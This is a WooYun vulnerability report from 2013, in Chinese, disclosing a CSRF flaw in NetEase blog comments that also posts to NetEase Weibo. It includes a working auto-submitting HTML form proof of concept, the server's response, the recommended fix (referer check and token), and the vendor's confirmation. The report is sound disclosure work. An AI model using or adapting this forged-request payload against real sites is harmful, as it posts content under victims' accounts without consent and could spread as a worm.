当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020441

漏洞标题:网易一处CSRF波及博客和微博,精心构造后可导致蠕虫

相关厂商:网易

漏洞作者: se55i0n

提交时间:2013-03-22 11:19

修复时间:2013-05-06 11:20

公开时间:2013-05-06 11:20

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-22: 细节已通知厂商并且等待厂商处理中
2013-03-25: 厂商已经确认,细节仅向厂商公开
2013-04-04: 细节向核心白帽子及相关领域专家公开
2013-04-14: 细节向普通白帽子公开
2013-04-24: 细节向实习白帽子公开
2013-05-06: 细节向公众公开

简要描述:

GIFT!

详细说明:

1)问题缺陷在网易博客的回复功能,该处功能会同步到网易微博,未校验referer;

2.png


2)登录网易博客,运行以下POC;

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://api.blog.163.com/lli.vip/dwr/call/plaincall/BlogBeanNew.addBlogComment.dwr" method="POST">
<input type="text" name="callCount" value="1" />
<input type="text" name="scriptSessionId" value="${scriptSessionId}187" />
<input type="text" name="c0-scriptName" value="BlogBeanNew" />
<input type="text" name="c0-methodName" value="addBlogComment" />
<input type="text" name="c0-id" value="0" />
<input type="text" name="c0-e1" value="string:fks_087065080081084067086083081071072087083074083095081070093" />
<input type="text" name="c0-e2" value="number:12979759" />
<input type="text" name="c0-e3" value="string:" />
<input type="text" name="c0-e4" value="string:ddd" />
<input type="text" name="c0-e5" value="string:i_majia" />
<input type="text" name="c0-e6" value="string:" />
<input type="text" name="c0-e7" value="number:-1" />
<input type="text" name="c0-e8" value="number:-1" />
<input type="text" name="c0-e9" value="number:12979759" />
<input type="text" name="c0-e10" value="string:lli.vip" />
<input type="text" name="c0-e11" value="string:%E6%9D%8E%E9%BB%8E" />
<input type="text" name="c0-e12" value="boolean:true" />
<input type="text" name="c0-param0" value="Object_Object:{blogId:reference:c0-e1,blogUserId:reference:c0-e2,blogTitle:reference:c0-e3,content:reference:c0-e4,publisherNickname:reference:c0-e5,publisherEmail:reference:c0-e6,mainComId:reference:c0-e7,replyComId:reference:c0-e8,replyToUserId:reference:c0-e9,replyToUserName:reference:c0-e10,replyToUserNick:reference:c0-e11,synchMiniBlog:reference:c0-e12}" />
<input type="text" name="c0-param1" value="string:" />
<input type="text" name="c0-param2" value="boolean:false" />
<input type="text" name="batchId" value="675126" />
<input type="submit" value="submit">
</form>
<script>
   document.se55i0n.submit();
</script>
</body>
</html>


其中参数"c0-e4"的值即为回复内容;
3)运行POC系统返回结果如下;

1.png


//#DWR-INSERT
//#DWR-REPLY
var s0=[];
dwr.engine._remoteHandleCallback('675126','0',{'abstract':"ddd",blogId:"fks_087065080081084067086083081071072087083074083095081070093",blogPermalink:"blog/static/129797592013126105133453",blogTitle:"\u996E\u98DF\u5F80\u4E8B\uFF082\uFF09",blogUserId:12979759,blogUserName:"lli.vip",circleId:0,circleName:null,circleUrlName:null,content:"ddd",id:"fks_095066085082084075093080084095085084088068093081083074",ip:"113.205.155.197",ipName:"\u91CD\u5E86 ",lastUpdateTime:1363878263025,mainComId:"-1",moveFrom:null,popup:false,publishTime:1363878263041,publishTimeStr:"23:04:23",publisherAvatar:0,publisherAvatarUrl:"http://img.bimg.126.net/photo/hmZoNQaqzZALvVp0rE7faA==/0.jpg",publisherEmail:"",publisherId:218104121,publisherName:"majiagege",publisherNickname:"i_majia",publisherUrl:null,replyComId:"-1",replyToUserId:12979759,replyToUserName:"lli.vip",replyToUserNick:"\u674E\u9ECE",shortPublishDateStr:"2013-3-21",spam:0,subComments:s0,synchMiniBlog:true,valid:0});


4)返回微博站点,刷新微博,查看效果;

3.png

漏洞证明:

见详细说明

修复方案:

校验referer,加入token

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-03-25 11:03

厂商回复:

感谢您对网易的关注,漏洞已经修复。

最新状态:

暂无